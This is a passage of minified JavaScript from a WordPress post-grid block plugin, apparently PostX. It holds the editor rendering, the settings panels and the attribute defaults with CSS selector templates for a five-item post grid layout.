ultp-block-row ultp-${ce} ultp-block-content-${ue}`},De.postsList.map(((a,r)=>{const c=0==r||3==r?JSON.parse(Q.replaceAll("u0022",'"')):JSON.parse(ee.replaceAll("u0022",'"')),m=0==r?_e:Ce;return(0,o.createElement)(e,{key:r,className:`ultp-block-item post-id-${a.ID} ${de?"ultp-animation-"+de:""}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap ultp-block-content-overlay"},(0,o.createElement)(s.w4,{imgOverlay:X,imgOverlayType:Y,imgAnimation:J,post:a,fallbackEnable:Ee,vidIconEnable:Se,catPosition:q,showImage:F,idx:r,showSmallCat:te,Category:0==r||te||3==r?"aboveTitle"!=q&&(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:a,catShow:z,catStyle:G,catPosition:q,customCatColor:me,onlyCatColor:ge,onClick:e=>{qe("taxonomy-/-category"),$e("cat")}})):null,onClick:()=>{qe("image"),$e("image")},imgSize:m}),Se&&a.has_video&&(0,o.createElement)(s.nk,{onClick:()=>{qe("video"),$e("video")}}),(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${ie}`},(0,o.createElement)("div",{className:"ultp-block-content-inner"},t(7,a.ID),"aboveTitle"==q&&(0==r||te||"layout3"==ce&&3==r)&&(0,o.createElement)(i.Z,{post:a,catShow:z,catStyle:G,catPosition:q,customCatColor:me,onlyCatColor:ge,onClick:e=>{qe("taxonomy-/-category"),$e("cat")}}),t(6,a.ID),a.title&&V&&1==$&&(0,o.createElement)(d.Z,{title:a.title,headingTag:be,titleLength:he,titleStyle:we,onClick:e=>{qe("title"),$e("title")}}),t(5,a.ID),(0==r||O||"layout3"==ce&&3==r)&&D&&"top"==se&&(0,o.createElement)(p.Z,{meta:c,post:a,metaSeparator:W,metaStyle:R,metaMinText:fe,metaAuthorPrefix:ke,metaDateFormat:xe,authorLink:Te,onClick:e=>{qe("meta"),$e("meta")}}),t(4,a.ID),a.title&&V&&0==$&&(0,o.createElement)(d.Z,{title:a.title,headingTag:be,titleLength:he,titleStyle:we,onClick:e=>{qe("title"),$e("title")}}),t(3,a.ID),(0==r||re||"layout3"==ce&&3==r)&&K&&(0,o.createElement)(n.Z,{excerpt:a.excerpt,excerpt_full:a.excerpt_full,seo_meta:a.seo_meta,excerptLimit:Z,showFullExcerpt:pe,showSeoMeta:ve,onClick:e=>{qe("excerpt"),$e("excerpt")}}),t(2,a.ID),(0==r||ne||"layout3"==ce&&3==r)&&le&&(0,o.createElement)(u.Z,{readMoreText:oe,readMoreIcon:ae,titleLabel:a.title,onClick:()=>{qe("read-more"),$e("read-more")}}),t(1,a.ID),(0==r||O||"layout3"==ce&&3==r)&&D&&"bottom"==se&&(0,o.createElement)(p.Z,{meta:c,post:a,metaSeparator:W,metaStyle:R,metaMinText:fe,metaAuthorPrefix:ke,metaDateFormat:xe,authorLink:Te,onClick:e=>{qe("meta"),$e("meta")}}),t(0,a.ID),(0,b.o6)()&&Le&&(0,o.createElement)(v.Z,{dcFields:Ie,setAttributes:l,startOnboarding:Ge,overlayMode:!0,inverseColor:!0})))))}))):(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:Pe})}(),Me&&"navigation"==Ne&&"topRight"!=je&&(0,o.createElement)(c.Z,{onClick:()=>{qe("pagination"),$e("pagination")}}))))}},11057:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8;function b({store:e}){const{queryType:t,titleAnimationArg:l,advFilterEnable:n,advPaginationEnable:r,V4_1_0_CompCheck:{runComp:u}}=e.attributes,{context:d,section:y,settingTab:b,setSettingTab:v}=e;return g((()=>{(0,m.CH)(d,n,e,r)}),[n,r,e.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6833",store:e}),(0,o.createElement)(p.Sections,{settingTab:b,setSettingTab:v},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:e,exclude:["queryNumber","queryNumPosts"]}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:e,initialOpen:!0,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns","queryNumber","queryNumPosts"],include:[{position:0,data:{type:"layout",block:"post-grid-5",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pg5/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg5/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pg5/l3.svg",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0}]}},{position:3,data:{type:"range",key:"overlayHeight",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")}},{position:6,data:{type:"toggle",key:"columnFlip",pro:!0,label:__("Flip Layout","ultimate-post")}},{position:13,data:{type:"range",key:"queryNumber",min:0,max:5,label:__("Number of Post","ultimate-post")}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:e,depend:"titleShow",initialOpen:y.title,include:[{position:5,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],hrIdx:[4,10]}),(0,o.createElement)(a.Hn,{isTab:!0,store:e,initialOpen:y.image,depend:"showImage",include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin","imgWidth","imageScale","imgHeight"],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:e,initialOpen:y.meta,depend:"metaShow",exclude:["metaSeparator","metaStyle","metaList","metaListSmall"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Meta Small Item","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],hrIdx:[{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:y["taxonomy-/-category"],depend:"catShow",store:e,exclude:["catPosition"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:y.excerpt,store:e,include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}],hrIdx:[4,7]}),(0,o.createElement)(a.oY,{isTab:!0,store:e,initialOpen:y["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:y.video,depend:"vidIconEnable",store:e}),(0,o.createElement)(a.fm,{store:e,include:l}),!u&&(0,o.createElement)(i.Z,{open:y.filter||y.pagination||y.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:e,initialOpen:y.heading,depend:"headingShow"}),"posts"!=t&&"customPosts"!=t&&(0,o.createElement)(a.B0,{pro:!0,isTab:!0,store:e,initialOpen:y.filter,depend:"filterShow",exclude:["filterType","filterValue"],include:[{position:1,data:a.YA},{position:2,data:a.sx}],hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{pro:!0,isTab:!0,store:e,initialOpen:y.pagination,depend:"paginationShow",include:[{position:1,data:{tab:"settings",type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exclude:["paginationType","paginationAjax","loadMoreText","paginationText","pagiMargin","navPosition"],hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["filterTypo","fliterSpacing","fliterPadding"],exSettings:["filterValue","filterType"],incSettings:[{position:1,data:a.YA},{position:2,data:a.sx}]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiPadding","navMargin"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding","navMargin"],exSettings:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition"],incSettings:[{position:1,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"],exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"]}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleBackground","titleHoverColor","titleAnimColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post"),include:[{position:0,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}}]}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaSeparator","metaStyle","metaList","metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing","metaSeparator","metaStyle","metaList"],incSettings:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Meta Small Item","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"],exSettings:["catPosition"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exSettings:["imgMargin","imgWidth","imageScale","imgHeight"],exStyle:["imgMargin","imgWidth","imageScale","imgHeight"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},68158:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},overlayHeight:{type:"object",default:{lg:"500",unit:"px"},style:[{selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-overlay,\n          {{ULTP}} .ultp-layout1 .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout2 .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout2 .ultp-block-item:nth-child(2) .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout1 .ultp-block-item:nth-child(2) .ultp-block-content-overlay { height: calc({{overlayHeight}}/2); } \n          {{ULTP}} .ultp-layout1 .ultp-block-item:first-child, \n          {{ULTP}} .ultp-layout2 .ultp-block-item:first-child { max-height: {{overlayHeight}}; } \n          {{ULTP}} .ultp-block-row { max-height: {{overlayHeight}}; }\n          {{ULTP}} .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-block-empty-image { width: 100%; object-fit: cover; height: 100%; } \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-image img, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-empty-image { width: 100%; object-fit: cover; height: 100%; } \n          @media (max-width: 768px) { \n            {{ULTP}} .ultp-block-item .ultp-block-content-overlay .ultp-block-image img, \n            {{ULTP}} ultp-block-content-overlay .ultp-block-empty-image { height: calc( {{overlayHeight}}/2 ); min-height: inherit; }\n          }"}]},columnGridGap:{type:"object",default:{lg:"5",unit:"px"},style:[{selector:"{{ULTP}} .ultp-layout1 .ultp-block-item:first-child .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout2 .ultp-block-item:first-child .ultp-block-content-overlay { height: calc(100% + {{columnGridGap}}); } \n          {{ULTP}} .ultp-block-row { grid-row-gap: {{columnGridGap}}; } \n          {{ULTP}} .ultp-block-row { grid-column-gap: {{columnGridGap}}; }"}]},queryNumber:{type:"string",default:"4",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]},{key:"querySticky",condition:"!=",value:!0}]}]},titleShow:{type:"boolean",default:!0},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important;}"}]},titleHoverColor:{type:"string",default:"rgba(255,255,255,0.70)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",family:"",weight:"700"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a, \n          {{ULTP}} .ultp-layout3 .ultp-block-item:nth-child(4) .ultp-block-title, \n          {{ULTP}} .ultp-layout3 .ultp-block-item:nth-child(4) .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"26",unit:"px"},decoration:"none",family:"",weight:"600"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap:not(.ultp-layout3) .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-items-wrap:not(.ultp-layout3) .ultp-block-item:not(:first-child) .ultp-block-title a, \n          {{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child):not(:nth-child(4)) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child):not(:nth-child(4)) .ultp-block-title a "}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleAnimation:{type:"string",default:""},showImage:{type:"boolean",default:!0},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"gridStyle",condition:"!=",value:"style1"}]}]},imgAnimation:{type:"string",default:"zoomIn"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap, \n          {{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap:hover, \n          {{ULTP}} .ultp-block-content-wrap:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-overlay"}]},imgOverlay:{type:"boolean",default:!0},imgOverlayType:{type:"string",default:"simgleGradient",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; 